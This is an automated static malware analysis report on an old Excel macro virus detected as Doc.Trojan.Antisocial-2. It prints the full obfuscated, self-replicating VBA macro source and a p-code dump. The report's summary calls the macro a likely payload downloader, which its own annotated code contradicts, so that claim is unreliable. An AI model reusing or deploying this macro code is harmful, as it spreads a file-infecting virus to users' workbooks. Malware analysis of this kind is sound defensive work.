Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6724f2caacf04a9…

MALICIOUS

Office (OLE)

34.5 KB · Created: 1996-10-14 23:33:28 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: 4e66da04256688321d5c513d7552604a SHA-1: e4bf935858945c3713cc5bcd07a486a343a7259f SHA-256: e6724f2caacf04a9e861783942e4a6ed02486472fae108775fe0bb5076584071
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic) · T1566.001 (Spearphishing Attachment)

The file is an Excel document containing VBA macros, specifically a Workbook_Open macro which is a common technique for initial execution. The macro code is obfuscated, making its exact function difficult to determine, but it is highly likely designed to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Antisocial-2' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Antisocial-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5108 bytes
SHA-256: e5c115fbf6e39ac5cba1c08695adfbe42a9982ffa3d5ba732b7dc85cdc4dd6e2
Detection
ClamAV: Doc.Trojan.Antisocial-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open() ' Auto-run entry point: decodes module lines 9-19 in place, then calls the now-decoded Good_Faith
If Workbooks.Count > 1 Then ' Only acts when at least one other workbook is open (the decoded code operates on other open workbooks)
For d = 9 To 19: C$ = "" ' Lines 9-19 are the eleven "'"-prefixed comment lines inside Good_Faith below; these line numbers are load-bearing, so no line may be inserted in this module
I = (ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1)) ' Reads the module's own source text through the VBA project object model (programmatic access Office normally blocks via its trust settings; a hardening and detection point)
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$ ' Character 2 of each line is that line's shift key (a one-digit string VBA coerces to a number); every character from position 3 on is decoded by subtracting it — a per-line Caesar shift, not encryption
ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d ' Overwrites the encoded comment with the decoded statement, so Good_Faith is plaintext code by the time it is called
Call Good_Faith: End If: End Sub ' Applying this same decode to lines 9-19 shows Good_Faith re-encoding this module with a fresh random shift and copying it into the first module of every open workbook, then saving each one — i.e. self-replicating, polymorphic macro-virus behaviour; nothing in the decoded text downloads or executes an external payload
Private Sub Good_Faith() ' Body is eleven shift-encoded lines (module lines 9-19) that Workbook_Open decodes in place before calling this; the character after the apostrophe is each line's shift key. These lines must stay byte-identical: any edit changes what is decoded (the space in the first line is probably a non-printable byte, Asc 127, lost in this rendered preview — TODO confirm against the raw artifact)
'6Gvvroigzout4Joyvrg Grkxzy&C&Lgryk
'5Xjy%HR%B%Ymnx\twpgttp3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj
'5Ktw%i%B%>%Yt%6>?%H)%B%''?%N%B%-HR3Qnsjx-i1%6..
'3i#@#Lqw+Uqg#-#;,#.#4=#Iru#[#@#4#Wr#Ohq+L,=#E'#@#Dvf+Plg+L/#[/#4,,#.#i=#F'#@#F'#)#Fku+E',=#Qh{w#[=#D#@#F'
'3WklvZrunerrn1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh1UhsodfhOlqh#g/#%*%#)#i#)#D=#Qh{w#g
'7TJ'D'JT5Spulz/83'JT5Jv|u{VmSpulz0
'1Gps!Iptu!>!2!Up!Xpslcpplt/Dpvou
'7^p{o'^vyrivvrz5P{lt/Ovz{05]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl
'75Klsl{lSpulz'83'5Jv|u{VmSpulzA'5HkkMyvtZ{ypun'TJA'Luk'^p{o
'6]uxqhuuqy4Ozks.Nuyz/4Yg|kGy&LorkTgsk@C]uxqhuuqy4Ozks.Nuyz/4L{rrTgsk
'1Ofyu!Iptu!(Hppe!Gbjui!Cz!Mzt!Lpwjdl///!Ifmmp-!WYfs(t!Boe!BWfs(t
End Sub ' Once decoded, this routine copies the whole module into every other open workbook and saves them (see Workbook_Open); ClamAV names the sample Doc.Trojan.Antisocial-2

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/a669ea8ea97d4e2686c6e4dc0f8973d1.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 12039 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	Ld Workbooks 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Gt 
' 	IfBlock 
' Line #2:
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	LitDI2 0x0009 
' 	LitDI2 0x0013 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St C$ 
' Line #3:
' 	Ld d 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #4:
' 	Ld I 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	St False 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld False 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	Ld C$ 
' 	St A 
' Line #5:
' 	Ld d 
' 	Ld A 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	NextVar 
' Line #6:
' 	ArgsCall (Call) Good_Faith 0x0000 
' 	BoS 0x0000 
' 	EndIfBlock 
' 	BoS 0x0000 
' 	EndSub 
' Line #7:
' 	FuncDefn (Private Sub Good_Faith())
' Line #8:
' 	QuoteRem 0x0000 0x0022 "6Gvvroigzout4Joyvrg Grkxzy&C&Lgryk"
' Line #9:
' 	QuoteRem 0x0000 0x0040 "5Xjy%HR%B%Ymnx\twpgttp3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj"
' Line #10:
' 	QuoteRem 0x0000 0x002F "5Ktw%i%B%>%Yt%6>?%H)%B%''?%N%B%-HR3Qns
... (truncated)